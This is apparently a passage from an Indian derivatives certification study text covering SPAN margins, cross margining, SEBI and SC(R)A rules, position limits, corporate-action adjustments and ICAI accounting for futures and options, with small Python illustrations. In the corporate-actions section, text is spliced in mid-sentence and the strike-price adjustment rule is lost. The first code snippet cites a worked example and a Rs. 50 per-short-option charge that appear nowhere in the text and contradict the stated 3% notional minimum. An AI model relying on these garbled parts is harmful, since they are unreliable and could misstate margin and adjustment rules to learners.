The short option minimum margin, equal to 3% of the notional value of all short index options, is charged if the sum of the worst scenario loss and the calendar spread margin is lower than the short option minimum margin. For stock options it is equal to 7.5% of the notional value based on the previous day's closing value of the underlying stock. Notional value of option positions is calculated on the short option positions by applying the last closing price of the relevant underlying.
Net option value
The net option value is calculated as the current market value of the option times the number of option units (positive for long options and negative for short options) in the portfolio. Net option value is added to the liquid net worth of the clearing member. This means that the current market value of short options is deducted from the liquid net worth and the market value of long options is added thereto. Thus mark to market gains and losses on option positions get adjusted against the available liquid net worth.
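The worked example above is just a floor rule, which can be written out directly. This is a hedged sketch; the Rs. 50 per-position charge is the chapter's hypothetical figure, and the function name is my own:

```python
def span_risk_requirement(scanning_risk, calendar_spread_charge,
                          num_short_options, min_charge_per_short=50.0):
    """SPAN risk charge floored by the short option minimum charge."""
    short_option_minimum = num_short_options * min_charge_per_short
    return max(scanning_risk + calendar_spread_charge, short_option_minimum)

# 20 short options at Rs.50 each => floor of Rs.1,000, which overrides a
# scanning risk + calendar spread charge of only Rs.500.
print(span_risk_requirement(400.0, 100.0, 20))  # 1000.0
```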
Net buy premium
To cover the one day risk on long option positions (for which premium shall be payable on T+1 day), net buy premium to the extent of the net long options position value is deducted from the Liquid Networth of the member on a real time basis. This would be applicable only for trades done on a given day. The net buy premium margin shall be released towards the Liquid Networth of the member on T+1 day after the completion of pay-in towards premium settlement.
8.5.3 Overall portfolio margin requirement
The total margin requirement for a member for a portfolio of futures and options contracts would be computed by SPAN as follows:
1. It adds up the scanning risk charges and the calendar spread charges.
2. It compares this figure to the short option minimum charge and selects the larger of the two. This is the SPAN risk requirement.
3. Total SPAN margin requirement is equal to the SPAN risk requirement less the net option value, which is the mark to market value of the difference in long option positions and short option positions.
4. Initial margin requirement = Total SPAN margin requirement + Net Buy Premium.
8.5.4 Cross Margining
Cross margining benefit is provided for off-setting positions at an individual client level in the equity and equity derivatives segments. The cross margin benefit is provided on the following offsetting positions:
a. Index futures and constituent stock futures in the F&O segment.
b. Index futures in the F&O segment and constituent stock positions in the Cash segment.
c. Stock futures in the F&O segment and the corresponding stock positions in the Cash segment.
The benefit is subject to the following conditions:
1. In order to extend the cross margin benefit as per (a) and (b) above, the basket of constituent stock futures/stock positions needs to be a complete replica of the index futures.
2. The positions in the F&O segment for stock futures and index futures of the same expiry month are eligible for cross margining benefit.
3. The position in a security is considered only once for providing cross margining benefit. E.g. positions in stock futures of security A used to set off against index futures positions are not considered again if there is an off-setting position in security A in the Cash segment.
4. Positions in option contracts are not considered for cross margining benefit.
The positions which are eligible for offset are subjected to spread margins. The spread margins shall be 25% of the applicable upfront margins on the offsetting positions.
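The four steps of section 8.5.3 can be combined into one sketch. The function and its arguments are illustrative stand-ins for quantities a member would read from the SPAN file, not an NSCCL API:

```python
def initial_margin_requirement(scanning_risk, calendar_spread_charges,
                               short_option_minimum, net_option_value,
                               net_buy_premium):
    """Illustrative steps 1-4 of the overall SPAN margin computation."""
    # 1. Add up the scanning risk charges and the calendar spread charges.
    step1 = scanning_risk + calendar_spread_charges
    # 2. Compare with the short option minimum charge; take the larger.
    span_risk = max(step1, short_option_minimum)
    # 3. Total SPAN margin = SPAN risk requirement less the net option value.
    total_span = span_risk - net_option_value
    # 4. Initial margin = Total SPAN margin + net buy premium.
    return total_span + net_buy_premium

print(initial_margin_requirement(14000, 1200, 3000, 2500, 0))  # 12700
```

Note that a positive net option value (net long options) reduces the requirement, consistent with it being added to liquid net worth.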
Prior to the implementation of the cross margining mechanism, positions in the equity and equity derivatives segments were treated separately, despite being traded on common underlying securities in both the segments. For example, if the margin payable by Mr. X in the capital market segment is Rs. 100 and in the F&O segment is Rs. 140, the total margin payable by Mr. X is Rs. 240. The cross margining mechanism reduces the margin for Mr. X from Rs. 240 to only Rs. 60.
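Mr. X's figures follow directly from the 25% spread margin rate on the offsetting positions; a one-line check (assuming the positions offset fully):

```python
SPREAD_MARGIN_RATE = 0.25  # 25% of the applicable upfront margins

def cross_margin(cash_segment_margin, fo_segment_margin):
    """Margin on fully offsetting positions after the cross margining benefit."""
    return SPREAD_MARGIN_RATE * (cash_segment_margin + fo_segment_margin)

# Rs.100 (capital market) + Rs.140 (F&O) = Rs.240 without cross margining,
# reduced to 25% of 240 = Rs.60 with it.
print(cross_margin(100, 140))  # 60.0
```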
CHAPTER 9: Regulatory Framework
The trading of derivatives is governed by the provisions contained in the SC(R)A, the SEBI Act, the rules and regulations framed thereunder, and the rules and bye-laws of the stock exchanges. This chapter takes a look at the legal and regulatory framework for derivatives trading in India. It also discusses in detail the recommendations of the L.C. Gupta Committee for trading of derivatives in India.
9.1 Securities Contracts (Regulation) Act, 1956
SC(R)A regulates transactions in securities markets along with derivatives markets. The original Act was introduced in 1956 and was subsequently amended in 1996, 1999, 2004, 2007 and 2010. It now governs the trading of securities in India. The term "securities" has been defined in the amended SC(R)A under Section 2(h) to include:
• Shares, scrips, stocks, bonds, debentures, debenture stock or other marketable securities of a like nature in or of any incorporated company or other body corporate.
• Derivative.
• Units or any other instrument issued by any collective investment scheme to the investors in such schemes.
• Security receipt as defined in clause (zg) of section 2 of the Securitisation and Reconstruction of Financial Assets and Enforcement of Security Interest Act, 2002.
• Units or any other such instrument issued to the investor under any mutual fund scheme(1).
• Any certificate or instrument (by whatever name called), issued to an investor by an issuer being a special purpose distinct entity which possesses any debt or receivable, including mortgage debt, assigned to such entity, and acknowledging beneficial interest of such investor in such debt or receivable, including mortgage debt, as the case may be.
• Government securities.
• Rights or interests in securities.
• Such other instruments as may be declared by the Central Government to be securities.
(1) Securities shall not include any unit linked insurance policy or scrips or any such instrument or unit, by whatever name called, which provides a combined benefit risk on the life of the persons and investments by such persons and issued by an insurer referred to in clause (9) of section 2 of the Insurance Act, 1938 (4 of 1938).
"Derivative" is defined to include:
• A security derived from a debt instrument, share, loan whether secured or unsecured, risk instrument or contract for differences or any other form of security.
• A contract which derives its value from the prices, or index of prices, of underlying securities.
Section 18A of the SC(R)A provides that notwithstanding anything contained in any other law for the time being in force, contracts in derivative shall be legal and valid if such contracts are:
• Traded on a recognized stock exchange
• Settled on the clearing house of the recognized stock exchange, in accordance with the rules and bye-laws of such stock exchange.
9.2 Securities and Exchange Board of India Act, 1992
The SEBI Act, 1992 provides for the establishment of the Securities and Exchange Board of India (SEBI) with statutory powers for (a) protecting the interests of investors in securities, (b) promoting the development of the securities market and (c) regulating the securities market. Its regulatory jurisdiction extends over corporates in the issuance of capital and transfer of securities, in addition to all intermediaries and persons associated with the securities market. SEBI has been obligated to perform the aforesaid functions by such measures as it thinks fit. In particular, it has powers for:
• regulating the business in stock exchanges and any other securities markets,
• registering and regulating the working of stock brokers, sub-brokers etc.,
• promoting and regulating self-regulatory organizations,
• prohibiting fraudulent and unfair trade practices relating to securities markets,
• calling for information from, undertaking inspection, conducting inquiries and audits of the stock exchanges, mutual funds and other persons associated with the securities market and other intermediaries and self-regulatory organizations in the securities market,
• performing such functions and exercising such powers according to the Securities Contracts (Regulation) Act, 1956, as may be delegated to it by the Central Government.
9.3 Regulation for Derivatives Trading
SEBI set up a 24-member committee under the Chairmanship of Dr. L. C. Gupta to develop the appropriate regulatory framework for derivatives trading in India. On May 11, 1998 SEBI accepted the recommendations of the committee and approved the phased introduction of derivatives trading in India beginning with stock index futures. According to this framework:
• Any Exchange fulfilling the eligibility criteria can apply to SEBI for grant of recognition under Section 4 of the SC(R)A, 1956 to start trading derivatives. The derivatives exchange/segment should have a separate governing council, and representation of trading/clearing members shall be limited to a maximum of 40% of the total members of the governing council. The exchange would have to regulate the sales practices of its members and would have to obtain prior approval of SEBI before start of trading in any derivative contract.
• The Exchange should have minimum 50 members. The members seeking admission in the derivative segment of the exchange would need to fulfill the eligibility conditions.
• The clearing and settlement of derivatives trades would be through a SEBI approved clearing corporation/house.
• Derivative brokers/dealers and clearing members are required to seek registration from SEBI.
• The minimum networth for clearing members of the derivatives clearing corporation/house shall be Rs. 300 Lakh. The networth of the member shall be computed as follows:
Capital + Free reserves
Less non-allowable assets
• The minimum contract value shall not be less than Rs. 2 Lakh. Exchanges have to submit details of the futures contracts they propose to introduce.
• The initial margin requirement, exposure limits linked to capital adequacy, and margin demands related to the risk of loss on the position will be prescribed by SEBI/Exchange from time to time.
• The trading members are required to have a qualified approved user and sales person who should have passed a certification programme approved by SEBI.
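The networth computation above is a simple arithmetic rule; a minimal sketch, with illustrative figures in Rs. Lakh and a check against the Rs. 300 Lakh clearing-member minimum:

```python
def member_networth(capital, free_reserves, non_allowable_assets):
    """Networth = capital + free reserves, less non-allowable assets."""
    return capital + free_reserves - non_allowable_assets

MIN_CLEARING_NETWORTH_LAKH = 300  # minimum for clearing members, Rs. Lakh

nw = member_networth(capital=250, free_reserves=120, non_allowable_assets=40)
print(nw, nw >= MIN_CLEARING_NETWORTH_LAKH)  # 330 True
```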
9.3.1 Forms of collateral acceptable at NSCCL
Members and authorized dealers have to fulfill certain requirements and provide collateral deposits to become members of the F&O segment. All collateral deposits are segregated into cash component and non-cash component. Cash component means cash, bank guarantee, fixed deposit receipts, T-bills and dated government securities. Non-cash component means all other forms of collateral deposits, like deposits of approved demat securities.
9.3.2 Requirements to become F&O segment member
The eligibility criteria for membership on the F&O segment is as given in Table 9.1. Anybody interested in taking membership of the F&O segment is required to take membership of "CM and F&O segment" or "CM, WDM and F&O segment". An existing member of the CM segment can also take membership of the F&O segment. A trading member can also be a clearing member by meeting additional requirements. There can also be only clearing members. Requirements for professional clearing membership are provided in Table 9.2.
Table 9.1: Eligibility criteria for membership on F&O segment (corporates)
Particulars (all values in Rs. Lakh):
- CM and F&O segment (Membership in CM segment and Trading/Trading and self-clearing membership in F&O segment): Net worth(1) 100
- CM, WDM and F&O segment (Membership in WDM segment, CM segment and Trading/Trading and clearing membership in F&O segment): Net worth(1) 200
Notes for Table 9.1:
1. No additional networth is required for self clearing members. However, a networth of Rs. 300 Lakh is required for TM-CM and PCM.
* Additional IFSD of Rs. 25 lakh with NSCCL is required for Trading and Clearing members (TM-CM) and for Trading and Self clearing members (TM/SCM).
** Additional Collateral Security Deposit (CSD) of Rs. 25 lakh with NSCCL is required for Trading and Clearing members (TM-CM) and for Trading and Self clearing members (TM/SCM). In addition, a member clearing for others is required to bring in IFSD of Rs. 2 lakh and CSD of Rs. 8 lakh per trading member whose trades he undertakes to clear in the F&O segment, and IFSD of Rs. 6 lakh and CSD of Rs. 17.5 lakh (Rs. 9 lakh and Rs. 25 lakh respectively for corporate members) per trading member in the CM segment.
Table 9.2: Requirements for Professional Clearing Membership (Amount in Rs. Lakh)
Particulars | CM Segment | F&O Segment
Eligibility: Trading Member of NSE/SEBI Registered Custodians/Recognised Banks
Net Worth: 300 | 300
Interest Free Security Deposit (IFSD)*: 25 | 25
Collateral Security Deposit (CSD): 25 | 25
Annual Subscription: 2.5 | Nil
* The Professional Clearing Member (PCM) is required to bring in IFSD of Rs. 2 lakh and CSD of Rs. 8 lakh per trading member whose trades he undertakes to clear in the F&O segment.
9.3.3 Requirements to become authorized / approved user
Trading members and participants are allowed to appoint, with the approval of the F&O segment of the exchange, authorized persons and approved users to operate the trading workstation(s). These authorized users can be individuals, registered partnership firms or corporate bodies as defined under the Companies Act, 1956. Authorized persons cannot collect any commission or any amount directly from the clients they introduce to the trading member who appointed them. However, they can receive a commission or any such amount from the trading member who appointed them, as provided under regulation. Approved users on the F&O segment have to pass a certification program which has been approved by SEBI. Each approved user is given a unique identification number through which he will have access to the NEAT system. The approved user can access the NEAT system through a password, and can change such password from time to time.
9.3.4 Position limits
Position limits have been specified by SEBI at trading member, client, market and FII levels respectively.
Trading member position limits
Trading member position limits are specified as given below:
1. Trading member position limits in equity index option contracts: The trading member position limit in equity index option contracts is the higher of Rs. 500 crore or 15% of the total open interest in the market in equity index option contracts. This limit is applicable on open positions in all option contracts on a particular underlying index.
2. Trading member position limits in equity index futures contracts: The trading member position limit in equity index futures contracts is the higher of Rs. 500 crore or 15% of the total open interest in the market in equity index futures contracts. This limit is applicable on open positions in all futures contracts on a particular underlying index.
3. Trading member position limits for combined futures and options position:
• For stocks having applicable market-wide position limit (MWPL) of Rs. 500 crores or more, the combined futures and options position limit is 20% of applicable MWPL or Rs. 300 crores, whichever is lower, and within which the stock futures position cannot exceed 10% of applicable MWPL or Rs. 150 crores, whichever is lower.
• For stocks having applicable market-wide position limit (MWPL) less than Rs. 500 crores, the combined futures and options position limit is 20% of applicable MWPL, and the futures position cannot exceed 20% of applicable MWPL or Rs. 50 crore, whichever is lower.
The Clearing Corporation shall specify the trading member-wise position limits on the last trading day of the month, which shall be reckoned for the purpose during the next month.
Client level position limits
The gross open position for each client, across all the derivative contracts on an underlying, should not exceed 1% of the free float market capitalization (in terms of number of shares) or 5% of the open interest in all derivative contracts in the same underlying stock (in terms of number of shares), whichever is higher. This limit is applicable on all open positions in all futures and option contracts on a particular underlying stock.
Market wide position limits
The market wide limit of open position (in terms of the number of underlying stock) on futures and option contracts on a particular underlying stock is 20% of the number of shares held by non-promoters in the relevant underlying security, i.e. 20% of the free float in terms of number of shares of a company. This limit is applicable on all open positions in all futures and option contracts on a particular underlying stock. The enforcement of the market wide limits is done in the following manner:
• At the end of the day the exchange tests whether the market wide open interest for any scrip exceeds 95% of the market wide position limit for that scrip. In case it does so, the exchange takes note of the open positions of all clients/TMs as at the end of that day for that scrip, and from the next day onwards they can trade only to decrease their positions through offsetting positions.
• At the end of each day during which the ban on fresh positions is in force for any scrip, the exchange tests whether any member or client has increased his existing positions or has created a new position in that scrip. If so, that client is subject to a penalty equal to a specified percentage (or basis points) of the increase in the position (in terms of notional value). The penalty is recovered before trading begins the next day. The exchange specifies the percentage or basis points, which is set high enough to deter violations of the ban on increasing positions.
• The normal trading in the scrip is resumed after the open outstanding position comes down to 80% or below of the market wide position limit.
• In addition to the above, the exchange also checks on a monthly basis whether a stock has remained subject to the ban on new positions for a significant part of the month, consistently for three months. If so, then the exchange phases out derivative contracts on that underlying.
FII / MF position limits
FII and MF position limits are specified as given below:
1. FII and MF position limits in index options contracts: The FII and MF position limits in all index options contracts on a particular underlying index are Rs. 500 crores or 15% of the total open interest of the market in index options, whichever is higher. This limit is applicable on open positions in all option contracts on a particular underlying index.
2. FII and MF position limits in index futures contracts: FII and MF position limits in all index futures contracts on a particular underlying index are the same as mentioned above for index option contracts. This limit is applicable on open positions in all futures contracts on a particular underlying index.
In addition to the above, FIIs and MFs can take exposure in equity index derivatives subject to the following limits:
a. Short positions in index derivatives (short futures, short calls and long puts) not exceeding (in notional value) the FII's/MF's holding of stocks.
b. Long positions in index derivatives (long futures, long calls and short puts) not exceeding (in notional value) the FII's/MF's holding of cash, government securities, T-bills and similar instruments.
Such short and long positions in excess of the said limits are compared with the FII's/MF's holding in stocks, cash etc. In this regard, if the open positions of the FII/MF exceed the limits as stated in points (a) and (b) above, such surplus is deemed to comprise short and long positions in the same proportion of the total open positions individually. The FIIs should report to the clearing member (custodian) the extent of the FII's holding of stocks, cash, government securities, T-bills and similar instruments, in a specified format, before the end of the day. The clearing member (custodian) in turn should report the same to the exchange. Failing to do so is a violation of the rules and regulations and attracts penalty and disciplinary action. The exchange monitors the FII position limits. The position limit for a sub-account is the same as the client level position limit.
Position limits for Mutual Funds
Mutual Funds are allowed to participate in the derivatives market at par with Foreign Institutional Investors (FII). Accordingly, mutual funds shall be treated at par with a registered FII in respect of position limits in index futures, index options, stock options and stock futures contracts. Mutual funds will be considered as trading members like registered FIIs, and the schemes of mutual funds will be treated as clients like sub-accounts of FIIs. The position limits for Mutual Funds and their schemes shall be as under:
1. Position limit for MFs in index futures and options contracts: as for FIIs above. A disclosure is required from any person or persons acting in concert who together own 15% or more of the open interest of all futures and options contracts on a particular underlying index on the Exchange.
2. Position limit for MFs in stock futures and options:
• For stocks having applicable market-wide position limit (MWPL) of Rs. 500 crores or more, the combined futures and options position limit is 20% of applicable MWPL or Rs. 300 crores, whichever is lower, and within which the stock futures position cannot exceed 10% of applicable MWPL or Rs. 150 crores, whichever is lower.
• For stocks having applicable market-wide position limit of less than Rs. 500 crores, the combined futures and options position limit is 20% of applicable MWPL or Rs. 50 crore, whichever is lower.
3. At the level of the FII sub-account / MF scheme: The gross open position across all futures and options contracts on a particular underlying security, of a sub-account of an FII / MF scheme, should not exceed the higher of:
• 1% of the free float market capitalisation (in terms of number of shares), or
• 5% of the open interest in the derivative contracts on a particular underlying stock (in terms of number of contracts).
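The higher-of limit rules and the market wide ban mechanics described in this section reduce to a few comparisons. A hedged sketch (function names and figures are illustrative, not exchange software):

```python
def client_position_limit(free_float_shares, market_open_interest_shares):
    """Client-level gross limit: higher of 1% of free float or 5% of open interest."""
    return max(0.01 * free_float_shares, 0.05 * market_open_interest_shares)

def mwpl(non_promoter_shares):
    """Market wide position limit: 20% of shares held by non-promoters."""
    return 0.20 * non_promoter_shares

def ban_status(market_oi, limit, currently_banned):
    """Fresh positions banned above 95% of MWPL; normal trading resumes at 80% or below."""
    if market_oi > 0.95 * limit:
        return True
    if currently_banned and market_oi <= 0.80 * limit:
        return False
    return currently_banned

limit = mwpl(10_000_000)                    # 2,000,000 shares
print(ban_status(1_950_000, limit, False))  # True  (97.5% of MWPL)
print(ban_status(1_550_000, limit, True))   # False (77.5%, ban lifted)
```

Note the hysteresis: once triggered at 95%, the ban persists until open interest falls to 80% or below.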
These position limits are applicable on the combined position in all futures and options contracts on an underlying security on the Exchange.
9.3.5 Reporting of client margin
Clearing Members (CMs) and Trading Members (TMs) are required to collect upfront initial margins from all their Trading Members/Constituents. CMs are required to compulsorily report, on a daily basis, details in respect of such margin amounts due and collected from the TMs/Constituents clearing and settling through them, with respect to the trades executed/open positions of the TMs/Constituents, which the CMs have paid to NSCCL for the purpose of meeting margin requirements. Similarly, TMs are required to report on a daily basis details in respect of such margin amounts due and collected from the constituents clearing and settling through them, with respect to the trades executed/open positions of the constituents, which the trading members have paid to the CMs, and on which the CMs have allowed initial margin limit to the TMs.
Adjustments for corporate actions
• Adjustments shall mean modifications to positions and/or contract specifications, namely strike price, market lot, multiplier and position. These adjustments shall be carried out on all open, exercised as well as assigned positions. This will facilitate retaining the relative status of positions, namely in-the-money, at-the-money and out-of-money. This will also address issues related to exercise and assignments.
• The corporate actions may be broadly classified under stock benefits and cash benefits. The various stock benefits declared by the issuer of capital are bonus, rights, merger/de-merger, amalgamation, splits, consolidations, hive-off, warrants and secured premium notes, and dividends.
• Adjustment for corporate actions shall be carried out on the last day on which a security is traded on a cum basis in the underlying cash market.
• The methodology for adjustment of corporate actions such as bonus, stock splits and consolidations is as follows:
consolidations.3.5 Reporting of client margin Clearing Members (CMs) and Trading Members (TMs) are required to collect upfront initial margins from all their Trading Members/ Constituents. CMs are required to compulsorily report.
price by the adjustment factor as under.
– Market lot/multiplier: The new market lot/multiplier shall be arrived at by multiplying the old market lot by the adjustment factor as under.
– Position: The new position shall be arrived at by multiplying the old position by the adjustment factor, which will be computed using the pre-specified methodology.

The adjustment factor for bonus, stock splits and consolidations is arrived at as follows:
– Bonus: Ratio A:B; Adjustment factor: (A+B)/B
– Stock splits and consolidations: Ratio A:B; Adjustment factor: B/A
– Right: Ratio A:B; Premium: C; Face value: D; Existing strike price: X; New strike price: ((B * X) + A * (C + D))/(A+B); Existing market lot / multiplier / position: Y; New issue size: Y * (A+B)/B

The above methodology may result in fractions due to the corporate action, e.g. a bonus ratio of 3:7. With a view to minimizing fraction settlements, the following methodology is proposed to be adopted:
1. Compute value of the position before adjustment.
2. Compute value of the position taking into account the exact adjustment factor.
3. Carry out rounding off for the strike price and market lot.
4. Compute value of the position based on the revised strike price and market lot.
The difference between 1 and 4 above, if any, shall be decided in the manner laid down by the group by adjusting the strike price or market lot, so that no forced closure of open positions is mandated.

• Dividends which are below 10% of the market value of the underlying stock would be deemed to be ordinary dividends, and no adjustment in the strike price would be made for ordinary dividends. For extra-ordinary dividends, above 10% of the market value of the underlying stock, the strike price would be adjusted.
• The exchange will on a case to case basis carry out adjustments for other corporate actions as decided by the group in conformity with the above guidelines.
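The factor arithmetic above can be illustrated with a short Python sketch (the ratio, strike, lot and position values below are invented for the example, not taken from the text):

```python
# Illustrative sketch of the bonus adjustment described above.
# The ratio, strike, lot and position values are made-up examples.

def bonus_adjustment_factor(a, b):
    """Bonus ratio A:B -> adjustment factor (A+B)/B."""
    return (a + b) / b

def adjust_for_bonus(strike, lot, position, a, b):
    f = bonus_adjustment_factor(a, b)
    new_strike = strike / f      # strike is divided by the factor
    new_lot = lot * f            # market lot is multiplied by the factor
    new_position = position * f  # position is multiplied by the factor
    return new_strike, new_lot, new_position

# Example: a 1:2 bonus (1 bonus share for every 2 held), factor = 3/2
strike, lot, pos = adjust_for_bonus(300.0, 100, 400, 1, 2)
print(strike, lot, pos)  # 200.0 150.0 600.0
```

For a rights issue the same pattern applies, except that the new strike comes from the ((B * X) + A * (C + D))/(A+B) formula instead of a simple division.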
CHAPTER 10: Accounting for Derivatives
This chapter gives a brief overview of the process of accounting of derivative contracts, namely index futures, stock futures, index options and stock options. The chapter takes a quick relook at the terms used in derivatives markets and discusses the principles of taxation for these contracts. It would however be pertinent to keep oneself updated with the changes in accounting norms for derivatives by regularly cross checking the website of the Institute of Chartered Accountants of India (www.icai.org).

10.1 Accounting for futures
The Institute of Chartered Accountants of India (ICAI) has issued guidance notes on accounting of index futures contracts from the view point of parties who enter into such futures contracts as buyers or sellers. For other parties involved in the trading process, like brokers, trading members, clearing members and clearing corporations, a trade in equity index futures is similar to a trade in, say, shares, and does not pose any peculiar accounting problems.

Accounting at the inception of a contract
Every client is required to pay to the trading member/clearing member the initial margin determined by the clearing corporation as per the bye-laws/regulations of the exchange for entering into equity index futures contracts. Initial margin paid/payable should be debited to "Initial margin - Equity index futures account". Additional margins, if any, should also be accounted for in the same manner. It may be mentioned that at the time when the contract is entered into for purchase/sale of equity index futures, no entry is passed for recording the contract because no payment is made at that time except for the initial margin. On the balance sheet date, the balance in the "Initial margin - Equity index futures account" should be shown separately under the head 'current assets'. In those cases where any amount has been paid in excess of the initial/additional margin, the excess should be disclosed separately as a deposit under the head 'current assets'. In cases where, instead of paying initial margin in cash, the client provides bank guarantees or lodges securities with the member, a disclosure should be made in the notes to the financial statements of the client.
Accounting at the time of daily settlement
Sometimes, instead of receiving/paying mark-to-market margin money on a daily basis, the client may keep a deposit with the trading member. The amount so paid is in the nature of a deposit and should be debited to an appropriate account, say, "Deposit for mark-to-market margin account". The amount of "mark-to-market margin" received/paid from such account should be credited/debited to "Mark-to-market margin - Equity index futures account" with a corresponding debit/credit to "Deposit for mark-to-market margin account". At the year-end, any balance in the "Deposit for mark-to-market margin account" should be shown as a deposit under the head 'current assets'.

Accounting for open positions
Positions left open on the balance sheet date must be accounted for. The debit/credit balance in the "mark-to-market margin - Equity index futures account" represents the net amount paid/received on the basis of movement in the prices of index futures up to the balance sheet date. Keeping in view 'prudence' as a consideration for preparation of financial statements, a provision for anticipated loss, which may be equivalent to the net payment made to the broker (represented by the debit balance in the "mark-to-market margin - Equity index futures account"), should be created by debiting the profit and loss account. The net amount received (represented by the credit balance in the "mark-to-market margin - Equity index futures account"), being anticipated profit, should be ignored and no credit for the same should be taken in the profit and loss account. The debit balance in the said "mark-to-market margin - Equity index futures account", i.e. the net payment made to the broker, may be shown under the head "current assets, loans and advances" in the balance sheet, and the provision created there-against should be shown as a deduction therefrom. On the other hand, the credit balance in the said account, i.e. the net amount received from the broker, should be shown as a current liability under the head "current liabilities and provisions" in the balance sheet.

Accounting at the time of final settlement
At the expiry of a series of equity index futures, the profit/loss on final settlement of the contracts in the series should be calculated as the difference between the final settlement price and the contract prices of all the contracts in the series. The profit/loss, so computed, should be recognized in the profit and loss account by corresponding debit/credit to "mark-to-market margin - Equity index futures account". However, where a balance exists in the provision account created for anticipated loss, any loss arising on such settlement should be first charged to such provision account, to the extent of the balance available in the provision account, and the balance of loss, if any, should be charged to the profit and loss account. The same accounting treatment should be made when a contract is squared-up by entering into a reverse contract. It appears that, at present, it is not feasible to identify the individual equity index futures contracts. Accordingly, if more than one contract in respect of the series of equity index futures contracts to which the squared-up contract pertains is outstanding at the time of the squaring of the contract, the contract price of the contract so squared-up should be determined using the First-In, First-Out (FIFO) method for calculating profit/loss on squaring-up.
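The FIFO rule mentioned above can be sketched in Python (the entry prices and quantities are invented for the example):

```python
from collections import deque

def fifo_squaring_profit(open_contract_prices, square_up_price, n, multiplier=1):
    """Profit/loss when n contracts are squared up at square_up_price,
    matching against the earliest open contracts first (FIFO).
    open_contract_prices: deque of entry prices, oldest first (mutated)."""
    pnl = 0.0
    for _ in range(n):
        entry = open_contract_prices.popleft()  # oldest contract first
        pnl += (square_up_price - entry) * multiplier
    return pnl

# Three long contracts opened at 100, 102, 105; two squared up at 110.
prices = deque([100.0, 102.0, 105.0])
print(fifo_squaring_profit(prices, 110.0, 2))  # 18.0 (10 + 8)
print(list(prices))  # [105.0] remains open
```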
On the settlement of an equity index futures contract, the initial margin paid in respect of the contract is released, which should be credited to "Initial margin - Equity index futures account". In case the client defaults in making payment of mark-to-market margin, the contract is closed out. The amount not paid by the Client is adjusted against the initial margin; in the books of the Client, the amount so adjusted should be debited to "mark-to-market - Equity index futures account". The amount of initial margin on the contract, in excess of the amount adjusted against the mark-to-market margin not paid, will be released. The accounting treatment in this regard will be the same as explained above. The amount of profit or loss on the contract so closed out should be calculated and recognized in the profit and loss account in the manner dealt with above.

Disclosure requirements
The amount of bank guarantee and book value as also the market value of securities lodged should be disclosed in respect of contracts having open positions at the year end, where initial margin money has been paid by way of bank guarantee and/or lodging of securities. The total number of contracts entered and the gross number of units of equity index futures traded (separately for buy/sell) should be disclosed in respect of each series of equity index futures. The number of equity index futures contracts having open position, the number of units of equity index futures pertaining to those contracts and the daily settlement price as of the balance sheet date should be disclosed separately for long and short positions. In the balance sheet, the "Deposit for mark-to-market margin account", if it continues to exist on the balance sheet date, should be shown separately under the head 'Current Assets'. In case the amount to be paid on daily settlement exceeds the initial margin, the excess is a liability and should be shown as such under the head 'current liabilities and provisions'.

10.2 Accounting for options
The Institute of Chartered Accountants of India issued a guidance note on accounting for index options and stock options from the view point of the parties who enter into such contracts as buyers/holders or sellers/writers. The seller/writer is required to pay initial margin for entering into the option contract; such initial margin paid would be debited to 'Equity Index Option Margin Account' or to 'Equity Stock Option Margin Account', as the case may be. The buyer/holder of the
option is not required to pay any margin. He is required to pay the premium. In his books, such premium would be debited to 'Equity Index Option Premium Account' or 'Equity Stock Option Premium Account', as the case may be. In the books of the seller/writer, such premium received should be credited to 'Equity Index Option Premium Account' or 'Equity Stock Option Premium Account', as the case may be.

Sometimes, the client deposits a lump sum amount with the trading/clearing member in respect of the margin instead of paying/receiving margin on a daily basis. In such case, the amount of margin paid/received from/into such accounts should be debited/credited to the 'Deposit for Margin Account'. At the end of the year, the balance in this account would be shown as a deposit under 'Current Assets'.

Accounting for open positions as on balance sheet dates
The 'Equity Index Option Premium Account' and the 'Equity Stock Option Premium Account' should be shown under the head 'Current Assets' or 'Current Liabilities', as the case may be. In the books of the buyer/holder, a provision should be made for the amount by which the premium paid for the option exceeds the premium prevailing on the balance sheet date, with a corresponding debit to the profit and loss account. The provision so created should be credited to 'Provision for Loss on Equity Index Option Account' or to the 'Provision for Loss on Equity Stock Options Account', as the case may be. In the books of the seller/writer, the provision should be made for the amount by which the premium prevailing on the balance sheet date exceeds the premium received for that option. This provision should be credited to 'Provision for Loss on Equity Index Option Account' or to the 'Provision for Loss on Equity Stock Option Account', as the case may be, with a corresponding debit to the profit and loss account. The provision made as above should be shown as a deduction from 'Equity Index Option Premium' or 'Equity Stock Option Premium', which is shown under 'Current Assets'. In case of any opening balance in the 'Provision for Loss on Equity Stock Options Account' or the 'Provision for Loss on Equity Index Options Account', the same should be adjusted against the provision required in the current year, and the profit and loss account be debited/credited with the balance provision required to be made/excess provision written back.
Accounting at the time of final settlement
On exercise of the option, the buyer/holder will receive the favorable difference, if any, between the final settlement price as on the exercise/expiry date and the strike price, which will be recognized as income. Similarly, at the time of final settlement, the seller/writer will pay the adverse difference, if any, between the final settlement price as on the exercise/expiry date and the strike price. Such payment will be recognized as a loss. As soon as an option gets exercised, the margin paid towards such option would be released by the exchange, which should be credited to 'Equity Index Option Margin Account' or to 'Equity Stock Option Margin Account', as the case may be, and the bank account will be debited. In addition to this entry, the premium paid/received will be transferred to the profit and loss account: the buyer/holder will recognize the premium as an expense and debit the profit and loss account by crediting 'Equity Index Option Premium Account' or 'Equity Stock Option Premium Account', as the case may be, while in the books of the seller/writer the premium received will be recognized as income.

Accounting at the time of squaring off an option contract
The difference between the premium paid and received on the squared off transactions should be transferred to the profit and loss account.

Following are the guidelines for accounting treatment in case of delivery settled index options and stock options. The accounting entries at the time of inception will be the same as those in case of cash settled options. If an option expires un-exercised, then the accounting entries will be the same as those in case of cash settled options. If the option is exercised, then shares will be transferred in consideration for cash at the strike price. For a call option, the buyer/holder will receive equity shares for which the call option was entered into; the buyer/holder should debit the relevant equity shares account and credit cash/bank. The seller/writer will deliver equity shares for which the call option was entered into; the seller/writer should credit the relevant equity shares account and debit cash/bank. For a put option, the buyer/holder will deliver equity shares for which the put option was entered into; the buyer/holder should credit the relevant equity shares account and debit cash/bank. The seller/writer will receive equity shares for which the put option was entered into; the seller/writer should debit the relevant equity shares account and credit cash/bank. Apart from the above, the accounting entries should be the same as those in case of cash settled options.
10.3 Taxation of Derivative Transactions in Securities
10.3.1 Taxation of Profit/Loss on derivative transactions in securities
